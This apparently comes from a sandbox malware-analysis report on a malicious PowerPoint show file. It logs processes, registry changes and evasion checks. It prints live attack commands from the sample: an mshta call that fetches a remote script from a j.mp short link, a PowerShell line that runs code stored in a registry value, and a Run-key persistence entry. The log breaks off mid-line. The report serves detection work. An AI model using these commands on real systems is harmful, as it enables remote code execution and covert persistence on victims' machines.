Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Scan emco Bautechni specification.pps | Virustotal: Detection: 69%
Source: Scan emco Bautechni specification.pps | ReversingLabs: Detection: 67%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps'
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps'
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ((gp HKCU:\Software).Fucku)|IEX
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close')
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe {path}
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe {path}
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps'
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe {path}
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe {path}
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Source: Binary string: mscorrc.pdb source: InstallUtil.exe, 0000000F.00000002.1226137253.04030000.00000002.00000001.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Code function: 15_2_00B6D800 pushad ; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Code function: 15_2_042744BF push 850FC085h; retn 0007h
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Code function: 16_2_00B2D800 pushad ; ret

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\mshta.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\mshta.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run koaskd mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).Fucku)|IEX"", 0 : window.close")
Source: C:\Windows\System32\mshta.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run koaskd

Source: C:\Windows\System32\mshta.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\mshta.exe TID: 4000 Thread sleep time: -1140000s >= -30000s
                Source: C:\Windows\System32\mshta.exe TID: 4000 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2124 Thread sleep time: -5160000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2392 Thread sleep time: -38000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2124 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\mshta.exe TID: 2248 Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480 Thread sleep time: -2220000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 2760 Thread sleep time: -360000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -54812s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -37908s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -37106s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -36906s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -35504s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -35304s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -35104s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -34302s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -33902s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776 Thread sleep time: -32900s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776